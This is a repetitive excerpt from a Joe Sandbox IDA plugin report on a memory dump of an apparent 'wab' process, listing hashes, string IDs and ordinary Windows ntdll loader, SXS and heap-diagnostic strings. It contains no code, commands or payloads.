                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                                  • API String ID: 0-541586583
                                                  • Opcode ID: 74e057ebdb2e91ed1732ec880c2ba33dab7f87f76ea3536d14adf09767ebba40
                                                  • Instruction ID: 1dfb693eeba1114074956df030c05634e149b3ca9b93178502aa9e54c3f8f4ba
                                                  • Opcode Fuzzy Hash: 74e057ebdb2e91ed1732ec880c2ba33dab7f87f76ea3536d14adf09767ebba40
                                                  • Instruction Fuzzy Hash: CEC1C775D003299BDB619F59CC84BBAB7B4EF45714F1140D9F848AB290E734AE81CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • ***Exception thrown within loader***, xrefs: 1FE24E27
                                                  • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 1FE24DF5
                                                  • LdrpProtectedCopyMemory, xrefs: 1FE24DF4
                                                  • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 1FE24E38
                                                  • minkernel\ntdll\ldrutil.c, xrefs: 1FE24E06
                                                  • LdrpGenericExceptionFilter, xrefs: 1FE24DFC
                                                  • Execute '.cxr %p' to dump context, xrefs: 1FE24EB1
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                  • API String ID: 0-2973941816
                                                  • Opcode ID: c63d0cc0dee6031d4e8b4dfeeb4ab57cb4e62dfe1777d23337c95f8da64cf752
                                                  • Instruction ID: bb3d9aad40c706b1a01c036e36d397abb4734333d70abec6bcda9671f8e6bb68
                                                  • Opcode Fuzzy Hash: c63d0cc0dee6031d4e8b4dfeeb4ab57cb4e62dfe1777d23337c95f8da64cf752
                                                  • Instruction Fuzzy Hash: 802135764402457FE7049B6CCC85DBA77FCFB82A68F900201F1269E692F910FE11C361
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                  • API String ID: 0-1109411897
                                                  • Opcode ID: ce9eab57f85c1f9a4547986024618117b0e0839ef2b45848ba55b1bf170cb586
                                                  • Instruction ID: 5d2a38a3f9a429c8cb4ca5661f40512650530de30cbceba7e7c4f778a64eeff4
                                                  • Opcode Fuzzy Hash: ce9eab57f85c1f9a4547986024618117b0e0839ef2b45848ba55b1bf170cb586
                                                  • Instruction Fuzzy Hash: 49A26C75A0566ACFDBA4DF25CD887ADB7B1AF44304F1042E9D84DA7290EB35AE81CF04
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                  • API String ID: 0-4098886588
                                                  • Opcode ID: 8c31e95b40545a92bb0ad324edde33c6750c3b2c7811983cc5161c295e536e2a
                                                  • Instruction ID: 6343729edb9694bb694b4d0231a3e4197f709e431f3cb2a4baf0c87bb56b5e0e
                                                  • Opcode Fuzzy Hash: 8c31e95b40545a92bb0ad324edde33c6750c3b2c7811983cc5161c295e536e2a
                                                  • Instruction Fuzzy Hash: 9A32B675E002A9CFDB62CF24C854BEEB7B5AF45344F1445EAE448AB250D7329E82CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • .Local\, xrefs: 1FDD2D91
                                                  • \WinSxS\, xrefs: 1FDD2E23
                                                  • @, xrefs: 1FDD2E4D
                                                  • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 1FE1276F
                                                  • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 1FE12706
                                                  • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 1FE1279C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                  • API String ID: 0-3926108909
                                                  • Opcode ID: f2598f9886bbc49bbebc20ab90438307e644f576b08694fd3569e7ad433612ee
                                                  • Instruction ID: 746654fef49a3bf37277330585b1234cdefb880be361292de0c3686af836b96d
                                                  • Opcode Fuzzy Hash: f2598f9886bbc49bbebc20ab90438307e644f576b08694fd3569e7ad433612ee
                                                  • Instruction Fuzzy Hash: 6781EEB55083419FCB51CF25C890AABB7E8BF85725F50895EF884CF281E770E944CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                  • API String ID: 0-3127649145
                                                  • Opcode ID: 38bd3ce8f37db75dae0abed35092b772a6e0449702bc801ff11dedd51031ec39
                                                  • Instruction ID: 06813efd15309216f3d7cdbc816de27c83f2a8e9e0c2af178a7bf8025773ae14
                                                  • Opcode Fuzzy Hash: 38bd3ce8f37db75dae0abed35092b772a6e0449702bc801ff11dedd51031ec39
                                                  • Instruction Fuzzy Hash: 13326C75A013199FDB61CF25CC88BAAB7F9FF44704F5042EAD509A7290EB71AA84CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                  • API String ID: 0-2518169356
                                                  • Opcode ID: 9efe35300e890894cb68639bf704f795621cf2413a00e3b92165fa1d13332aa4
                                                  • Instruction ID: 7a498f514db682d5fd206891a4ead005cd8c61af5279126c3a508aa4a51c3211
                                                  • Opcode Fuzzy Hash: 9efe35300e890894cb68639bf704f795621cf2413a00e3b92165fa1d13332aa4
                                                  • Instruction Fuzzy Hash: 3B91A176D00B198BCB11CF68C981AAEB7F1FF89314F95416AE811EB350E775EA41CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                  • API String ID: 0-3492000579
                                                  • Opcode ID: 14e716bf20c21699b9e3bce0325814e2232e38ed7ea76f7d6bdb2ccbd0d795f3
                                                  • Instruction ID: 658cf081eef5f1bc096b556e759e318448f7af45321e07139826cee636827d8a
                                                  • Opcode Fuzzy Hash: 14e716bf20c21699b9e3bce0325814e2232e38ed7ea76f7d6bdb2ccbd0d795f3
                                                  • Instruction Fuzzy Hash: 54712234910285DFCB01CFA8D8846EDFBF2FF8A718F18815AE4459B291CB36A945CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                  • API String ID: 0-3224558752
                                                  • Opcode ID: 031359bdc4edd8228ed9b3f9a648d1c429022b470ea5e7b5e546d5df77457d49
                                                  • Instruction ID: 187670d3f3ed21b75c57c8346ae091f9b2284e99879137253878ac4748d5ebd5
                                                  • Opcode Fuzzy Hash: 031359bdc4edd8228ed9b3f9a648d1c429022b470ea5e7b5e546d5df77457d49
                                                  • Instruction Fuzzy Hash: 3C415535A10385EFC741DF64C894BAAB3F9FF01728F14866DE4554B290CB38B885CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Item:$ Language:$ Name:$SR - $Type:
                                                  • API String ID: 0-3082644519
                                                  • Opcode ID: 3b89d6d4d900d0825dd2d444e9935c96e5e1b24205b9275b1ff2ab6cde4ec60e
                                                  • Instruction ID: cbed22c3013c7c759d1c0936c867926d951f258ee6f20df86f13e093cf36c978
                                                  • Opcode Fuzzy Hash: 3b89d6d4d900d0825dd2d444e9935c96e5e1b24205b9275b1ff2ab6cde4ec60e
                                                  • Instruction Fuzzy Hash: 6141A872B002685FDB61CB64CC48BEAB7BCEF46314F4141D5E44997281EE34AE85CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %ld leaks detected.$HEAP: $HEAP[%wZ]: $Inspecting leaks at process shutdown ...$No leaks detected.
                                                  • API String ID: 0-1155200129
                                                  • Opcode ID: cfcee8b945ae493802f3089e14bb9d82fbc82c3fb88f10a8c19af1774676f805
                                                  • Instruction ID: 42bab45ec7298f7eb9d88cb783004d3288e8bd4a0744a6eee013ed90d6099efe
                                                  • Opcode Fuzzy Hash: cfcee8b945ae493802f3089e14bb9d82fbc82c3fb88f10a8c19af1774676f805
                                                  • Instruction Fuzzy Hash: D731B335225781DFC795BB64C9D8F7573E4FB46A34F16801AE8018F651DA3AB8A1CB20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                  • API String ID: 0-1222099010
                                                  • Opcode ID: 4832a3a166e32b4f945e7399e0e74c1571c59f9ce96c362bf5cfbb1e9bfa162b
                                                  • Instruction ID: dda9fde7584f7b6d015424f5c0170bb08eab48486bb1599056bf9d2441cc71d5
                                                  • Opcode Fuzzy Hash: 4832a3a166e32b4f945e7399e0e74c1571c59f9ce96c362bf5cfbb1e9bfa162b
                                                  • Instruction Fuzzy Hash: 293159382257C4EFD792DB24CD58BA977F4FF01724F094249E4524B691CBB9B886C722
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$.mui$.mun$SystemResources\
                                                  • API String ID: 0-3047833772
                                                  • Opcode ID: 411814c6c192e4bb3175a2b7e78fad8676cb6d5f7604e406c70fb75622123937
                                                  • Instruction ID: e318ffe2dd4a093f1bccb8be35ca7f5d310c6acc2e669fdd27f8e71496044da9
                                                  • Opcode Fuzzy Hash: 411814c6c192e4bb3175a2b7e78fad8676cb6d5f7604e406c70fb75622123937
                                                  • Instruction Fuzzy Hash: 4D623D76B007699FCB61CF64CC40BE9B7B8BB06314F0445E9E409A7650E731AE85CF56
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 1FE2CFBD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID: CallFilterFunc@8
                                                  • String ID: @$@4Cw@4Cw
                                                  • API String ID: 4062629308-3101775584
                                                  • Opcode ID: 813810c123b2c43c1ce68a25cedb3d4076d64ab344da45018a335021ebfac1bb
                                                  • Instruction ID: 0e3b5667406af0d026dad9f2415a5dc30220597dc8c29d63c17f539fb26892e4
                                                  • Opcode Fuzzy Hash: 813810c123b2c43c1ce68a25cedb3d4076d64ab344da45018a335021ebfac1bb
                                                  • Instruction Fuzzy Hash: BC419E75900264DFCB21CFA8C850AAEBBF9FF45714F41412AE905DB2A4E736E901CB71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  • Opcode ID: 56a0f63712c742b153b6b0588c0d2f3fef94b4aa8dfc90194699821fdc4d24b0
                                                  • Instruction ID: 714d219c6c845285dac5d66712f7227c50c76d74ef14c8f87f0286ae1f9e47b1
                                                  • Opcode Fuzzy Hash: 56a0f63712c742b153b6b0588c0d2f3fef94b4aa8dfc90194699821fdc4d24b0
                                                  • Instruction Fuzzy Hash: 0AE28C74A003559FDB54CF68C890BBABBF1FF4A304F14829DE84AAB395D735A845CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • HEAP: , xrefs: 1FE054E0, 1FE055A1
                                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 1FE054ED
                                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 1FE055AE
                                                  • HEAP[%wZ]: , xrefs: 1FE054D1, 1FE05592
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                  • API String ID: 0-1657114761
                                                  • Opcode ID: 37d4a9836fdfae73eccca059e9dbf826e255097f275ee94b2ed3c42977779ee3
                                                  • Instruction ID: 4c682709c12eb781c3f36684c68b57d687b515cf1fd9c06328c75ac7e5dc72f1
                                                  • Opcode Fuzzy Hash: 37d4a9836fdfae73eccca059e9dbf826e255097f275ee94b2ed3c42977779ee3
                                                  • Instruction Fuzzy Hash: 3CA1DF34A00746AFD754CF64C888BBABBE1FF46304F14866DD48A8B681E735F944CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 1FE13437
                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 1FE1342A
                                                  • RtlDeactivateActivationContext, xrefs: 1FE13425, 1FE13432, 1FE13451
                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 1FE13456
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                  • API String ID: 0-1245972979
                                                  • Opcode ID: 6e1abe79f23f906f9ca38d8758e7dbb9480277ddf9ebf02b78a3495e354258b9
                                                  • Instruction ID: ae4da712e80922ce5b672564d1db5941421a685d69ef32d6014814d19453b7d7
                                                  • Opcode Fuzzy Hash: 6e1abe79f23f906f9ca38d8758e7dbb9480277ddf9ebf02b78a3495e354258b9
                                                  • Instruction Fuzzy Hash: 7E6125326047529FC752CF19C881BBAB3A5EF81B64F518519F8A5DF280E734F811CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • LdrpFindDllActivationContext, xrefs: 1FE13636, 1FE13662
                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1FE1362F
                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 1FE13640, 1FE1366C
                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 1FE1365C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 0-3779518884
                                                  • Opcode ID: 7e429989a961758767990a4c06f683170a5e4e48ed214beff9fd669bf5277584
                                                  • Instruction ID: a803357c42079a395a2eb1232c9f1ceffc41edee173582955411b5b773cfa292
                                                  • Opcode Fuzzy Hash: 7e429989a961758767990a4c06f683170a5e4e48ed214beff9fd669bf5277584
                                                  • Instruction Fuzzy Hash: D931FC72900752AFDB91EB15CC88BF572A4BB03754F064167F8495B2E0EBA1BC84C795
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
                                                  • API String ID: 0-4256168463
                                                  • Opcode ID: 3a2f36589a23607ca958b214c24c9b54f51075d93efc8b62aea0da02f8976f0a
                                                  • Instruction ID: e0545a1f866106a94ffafe755b9ec3b2e802e804ec24f7d67ac2096a7a08eb2d
                                                  • Opcode Fuzzy Hash: 3a2f36589a23607ca958b214c24c9b54f51075d93efc8b62aea0da02f8976f0a
                                                  • Instruction Fuzzy Hash: 7E01C036120780EBCB919FA4E844BE673E9FF42A64F254559E401DB290EE34F946C6A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  • Opcode ID: ca0d08294608daa76bbbf72ff99c48f357043b322a3b5e5b54d991d0e5aa1236
                                                  • Instruction ID: 05d51fb9ec79924277232d0c59d7637956b2e5cc675177124347ec1194ba2777
                                                  • Opcode Fuzzy Hash: ca0d08294608daa76bbbf72ff99c48f357043b322a3b5e5b54d991d0e5aa1236
                                                  • Instruction Fuzzy Hash: A522E474600746DFDB15DF64C890BBABBF5FF46708F248599E4868B281E735E842CB60
